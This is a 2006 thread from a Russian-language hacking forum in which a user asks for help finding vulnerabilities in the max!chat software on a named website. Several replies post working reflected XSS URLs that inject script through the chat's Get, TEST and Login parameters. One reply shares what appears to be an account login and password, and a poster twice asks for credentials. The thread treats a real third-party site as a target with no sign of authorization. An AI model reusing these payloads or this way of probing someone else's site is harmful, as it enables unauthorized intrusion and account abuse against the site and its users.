Чаты max!chat

Discussion in 'Веб-уязвимости' started by nicklon, 23 Mar 2006.

  1. nicklon

    nicklon New Member

    Joined:
    23 Mar 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Пипл, помогите определить уязвимости в чате на http://max-club.ru/ используется ПО max!chat исходников нигде не видел, в самом чате все режется блин
     
  2. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Логин и пасс в студию!

    а так вообще вот...
    _http://www.max-club.ru/cgi/newchat.exe?Get='<script>alert('passive_XSS_by_DRON-ANARCHY')</script>AuthorizedTop&Room=Enter
     
    #2 DRON-ANARCHY, 23 Mar 2006
    Last edited: 23 Mar 2006
  3. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Да и вообще..времени щас протсо нету....
    _http://www.max-club.ru/cgi/newchat.exe?TEST=<script>alert('passive_XXS_by_DRON-ANARCHY')</script>
     
  4. nicklon

    nicklon New Member

    Joined:
    23 Mar 2006
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    подробнее мона?
     
  5. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Ну что? Получилось?
    Кстати, логин и пасс все-таки выложи...
     
  6. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    Логин:antichat
    пасс:qwe123
    _http://www.max-club.ru/cgi/newchat.exe?Com=Go&Get=Info&Login=<script>alert()</script>&Room=Enter&SID=chat
    Набит пассивными ксс
     
    #6 Антошка2003, 25 Mar 2006
    Last edited: 25 Mar 2006
  7. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Ну я приблизително это и описал.. там мона и аод Form и под Get и под еще много чего пихать хсс принцип один...